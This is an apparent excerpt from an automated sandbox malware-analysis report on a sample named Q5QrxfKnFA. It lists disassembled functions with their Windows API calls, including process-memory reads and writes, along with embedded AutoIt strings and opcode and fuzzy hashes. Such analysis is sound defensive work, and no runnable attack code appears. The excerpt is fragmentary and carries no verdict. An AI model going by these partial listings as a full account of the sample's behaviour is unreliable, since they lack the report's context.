                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: b98d067d0e5f44269bbc8bec68de00d54677d0939999d1dca9492153716b29ed
                                                        • Instruction ID: e1288944d4b030b72e4516487e9ec78eab9365ea2e9d62168db653b80c5fafa9
                                                        • Opcode Fuzzy Hash: b98d067d0e5f44269bbc8bec68de00d54677d0939999d1dca9492153716b29ed
                                                        • Instruction Fuzzy Hash: C101A230414308ABEF266B60ED4EF9677BDFB00B06F004669A5C2E14E1DBF0B9549B90
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 003413BF
                                                        • StrokeAndFillPath.GDI32(?,?,0037B888,00000000,?), ref: 003413DB
                                                        • SelectObject.GDI32(?,00000000), ref: 003413EE
                                                        • DeleteObject.GDI32 ref: 00341401
                                                        • StrokePath.GDI32(?), ref: 0034141C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: f6cdc51a23f07ec54f880bcfa7635a89300a0c475115341f62003844a15ece43
                                                        • Instruction ID: 9fa4076c9fb10f4e1b52a0d9d84e3cfff85b1172530a11dc5a91da709528c34b
                                                        • Opcode Fuzzy Hash: f6cdc51a23f07ec54f880bcfa7635a89300a0c475115341f62003844a15ece43
                                                        • Instruction Fuzzy Hash: CCF0FB31000B089FDB126F66ED4CB593BE9E700726F08C234E869981B1C73069A5DF14
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 003AC432
                                                        • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003AC44A
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • CoUninitialize.OLE32 ref: 003AC6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: 329f26b619709689e1a0f427d7fd0503e8ed7a0302262d77afc260c2e3be857c
                                                        • Instruction ID: 357769e8a84e4e9839a11db91c9ff3d566a57d18de781722cfcb7047cfe0fac6
                                                        • Opcode Fuzzy Hash: 329f26b619709689e1a0f427d7fd0503e8ed7a0302262d77afc260c2e3be857c
                                                        • Instruction Fuzzy Hash: 83A12971104205AFD701EF54C881EAFB7E8EF99354F00492DF1569F1A2EB71EA49CB62
                                                        APIs
                                                          • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                          • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 00347A51: _memmove.LIBCMT ref: 00347AAB
                                                        • __swprintf.LIBCMT ref: 00352ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00352D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 3937468612d761f0d1ec81941021dd0998a9ba674d4342784ad8ef65d3cd5197
                                                        • Instruction ID: 9fb74108f67fe48ff5fd323689e2355bbcd54214f6d79f17cdf8bdbdc81f3c5d
                                                        • Opcode Fuzzy Hash: 3937468612d761f0d1ec81941021dd0998a9ba674d4342784ad8ef65d3cd5197
                                                        • Instruction Fuzzy Hash: F49137715082019BC716EF24C896D6BB7E8AF96710F01495EF8859F2A2EB20ED48CB52
                                                        APIs
                                                          • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                        • CoInitialize.OLE32(00000000), ref: 003AB9BB
                                                        • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003AB9D4
                                                        • CoUninitialize.OLE32 ref: 003AB9F1
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 9163b4f61656c1485063c6d12f19631d9190645dce32eb0571cdb823ee5385e9
                                                        • Instruction ID: 9af1facb08da29cf768984507df86c595c14a90b95b608d664bf2702bc5f09bf
                                                        • Opcode Fuzzy Hash: 9163b4f61656c1485063c6d12f19631d9190645dce32eb0571cdb823ee5385e9
                                                        • Instruction Fuzzy Hash: 69A155756043059FCB12DF14C484E6ABBE5FF8A314F058999F89A9B3A2CB31EC45CB91
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0039B4BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container$%=
                                                        • API String ID: 3565006973-2852750407
                                                        • Opcode ID: e6c55ebccc55f168bc413ace7c689c334cc7e67a8fe9fcddf3a56777cf709788
                                                        • Instruction ID: 05fac280d76901f742fcdd069852ba4922257ae77cce5e8387d327a9c8828f88
                                                        • Opcode Fuzzy Hash: e6c55ebccc55f168bc413ace7c689c334cc7e67a8fe9fcddf3a56777cf709788
                                                        • Instruction Fuzzy Hash: 22915774200601EFDB15DF64D984B6ABBF9FF49710F20856EE94ACB6A1DB70E841CB60
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 003650AD
                                                          • Part of subcall function 003700F0: __87except.LIBCMT ref: 0037012B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: fa8f18962ab935085d3684ce1af04d4bb42820d595d611c3cf18936c7fb128ec
                                                        • Instruction ID: 048d60513161a8e4605663dbbf9dfd6de1102a2c2d55232b50cc7cbf7ecbf47f
                                                        • Opcode Fuzzy Hash: fa8f18962ab935085d3684ce1af04d4bb42820d595d611c3cf18936c7fb128ec
                                                        • Instruction Fuzzy Hash: D0517B6591C502D6DB2B7724CD4137E2B98AB41700F20CD79E4D98A2AEEF38CDC49A86
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3c5$_5
                                                        • API String ID: 4104443479-2150917133
                                                        • Opcode ID: 135fc18bc5443ff0cff0ccced5be0ec7fcf5000b80389aacd4c676bdea870b42
                                                        • Instruction ID: c993c63f916bdf8ce276a6c9d3a4a8f4a60fea1256d3a35886465fb5a20c3cad
                                                        • Opcode Fuzzy Hash: 135fc18bc5443ff0cff0ccced5be0ec7fcf5000b80389aacd4c676bdea870b42
                                                        • Instruction Fuzzy Hash: 9651AD709006099FCF26DF68C880AAEB7B5FF44304F608569E85AD7250EB30E995CB51
                                                        APIs
                                                          • Part of subcall function 003A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00399296,?,?,00000034,00000800,?,00000034), ref: 003A14E6
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0039983F
                                                          • Part of subcall function 003A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003A14B1
                                                          • Part of subcall function 003A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003A1409
                                                          • Part of subcall function 003A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0039925A,00000034,?,?,00001004,00000000,00000000), ref: 003A1419
                                                          • Part of subcall function 003A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0039925A,00000034,?,?,00001004,00000000,00000000), ref: 003A142F
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003998AC
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003998F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: d2fc13337426619bca1710fe624c4994cda9a67c55795b32312223bc92803bc8
                                                        • Instruction ID: e0727ad6d318a579a8a551650541454d21c1465e7c9e69be62dca2aec90632bb
                                                        • Opcode Fuzzy Hash: d2fc13337426619bca1710fe624c4994cda9a67c55795b32312223bc92803bc8
                                                        • Instruction Fuzzy Hash: A0412E76901218AFDF11DFA8CC86EDEBBB8EB09300F004199F955B7191DA716E45CBA1
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CF910,00000000,?,?,?,?), ref: 003C79DF
                                                        • GetWindowLongW.USER32 ref: 003C79FC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C7A0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: ff1d3f441174bf29a5682464da6e56e44f57cc001294ba8e376789c9fc9e1fbd
                                                        • Instruction ID: cf0e6f66c2f956dea0f157216fd145ebaac05c29e825af3bd25033b0c696cdf3
                                                        • Opcode Fuzzy Hash: ff1d3f441174bf29a5682464da6e56e44f57cc001294ba8e376789c9fc9e1fbd
                                                        • Instruction Fuzzy Hash: 8F319C35204606AFDB129E38CC45FEB7BA9EB05324F218729F875E62E0D731ED519B50
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003C7461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003C7475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C7499
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: f9cdbd483152f0302c1bb9995c0680def87d59acc3b6a12a787fba1f1c72ad9d
                                                        • Instruction ID: c268180a559df522a34bdddbe6362ee666e139ffd09c1d0bc62302cb931204e0
                                                        • Opcode Fuzzy Hash: f9cdbd483152f0302c1bb9995c0680def87d59acc3b6a12a787fba1f1c72ad9d
                                                        • Instruction Fuzzy Hash: E621A332500218AFDF168F65CC46FEA3B69EF48724F120118FE15AB1D0DA75AC51DBA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C7C4A
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C7C58
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C7C5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: 8b69a0b5a40e288caccdc991db6d776098daf9baf8aaa76a4c6d2a85d2c1921a
                                                        • Instruction ID: 88b2c70a0942ea5af5ee883c69d0b8a82c611e30943a9b27102308d46562daf2
                                                        • Opcode Fuzzy Hash: 8b69a0b5a40e288caccdc991db6d776098daf9baf8aaa76a4c6d2a85d2c1921a
                                                        • Instruction Fuzzy Hash: 04217CB5604209AFDB12EF24DCC1EA737EDEB4A3A4B154059FA05DB3A1CB31EC519B60
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C6D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C6D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C6D70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 37184922ca4cd72b19edfdea8914cf295dbafbca5e26999c65496452e423476c
                                                        • Instruction ID: b170f06ddc95423c9754cf58ddb065428ec7f8f7ccec4c15f6b8c0f9deb630f8
                                                        • Opcode Fuzzy Hash: 37184922ca4cd72b19edfdea8914cf295dbafbca5e26999c65496452e423476c
                                                        • Instruction Fuzzy Hash: 48219232610118BFDF128F54CC46FBB3BBEEF89750F018128F9459B1A0C671AC519BA0
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 003B3A66
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d$%=
                                                        • API String ID: 3506404897-2298458297
                                                        • Opcode ID: d3b6229309fbd6e42805e45c6ea439f066d3c243edb25007543f27338701a778
                                                        • Instruction ID: 9d040fcc65525f7425d5709b134bd8d7b7220fb925453641da65cf8cea58079f
                                                        • Opcode Fuzzy Hash: d3b6229309fbd6e42805e45c6ea439f066d3c243edb25007543f27338701a778
                                                        • Instruction Fuzzy Hash: 59214F31A00229ABCF16EF64CC82AEE77B9EF44704F504455E655AF182DB30EA45CB61
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C7772
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C7787
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C7794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: adef56747f464737239280110e3d62ce84248c30c8476464621f5bacb737e5b3
                                                        • Instruction ID: 7efc3e7214984171dc2fa05d9ea25d9bc9c0763c84f6fa826391d38b74de3f14
                                                        • Opcode Fuzzy Hash: adef56747f464737239280110e3d62ce84248c30c8476464621f5bacb737e5b3
                                                        • Instruction Fuzzy Hash: BA11C172244208BAEF255F65CC05FEB7BADEF89B64F12412CFA45A6090C672A851DB20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt
                                                        • String ID: ?$@B@
                                                        • API String ID: 3494438863-2252957899
                                                        • Opcode ID: 3d5261d7416a5e439320ca1538d8c65e17897d50a881950e0ad269c00a9f3cc5
                                                        • Instruction ID: 64b80cf317036a94e565a33652848b9efe20a31a0aa81464d97b978648aa1e59
                                                        • Opcode Fuzzy Hash: 3d5261d7416a5e439320ca1538d8c65e17897d50a881950e0ad269c00a9f3cc5
                                                        • Instruction Fuzzy Hash: 1AF0FC75204612CBFB269F16BD53B632795EB057B0F10807EE200DF198EB3088404EC8
                                                        APIs
                                                        • __lock.LIBCMT ref: 00369B94
                                                          • Part of subcall function 00369C0B: __mtinitlocknum.LIBCMT ref: 00369C1D
                                                          • Part of subcall function 00369C0B: EnterCriticalSection.KERNEL32(00000000,?,00369A7C,0000000D), ref: 00369C36
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00369BA4
                                                          • Part of subcall function 00369100: ___addlocaleref.LIBCMT ref: 0036911C
                                                          • Part of subcall function 00369100: ___removelocaleref.LIBCMT ref: 00369127
                                                          • Part of subcall function 00369100: ___freetlocinfo.LIBCMT ref: 0036913B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                        • String ID: 8?$8?
                                                        • API String ID: 547918592-297661732
                                                        • Opcode ID: 180f615ddfc6a34ac3d3791a404a0e2a59433e269b2f6f7a68ee062fd7433087
                                                        • Instruction ID: 1e72c3896bad6232a75347ccc671decf004a29da13c23da6491dc7ef5803eecc
                                                        • Opcode Fuzzy Hash: 180f615ddfc6a34ac3d3791a404a0e2a59433e269b2f6f7a68ee062fd7433087
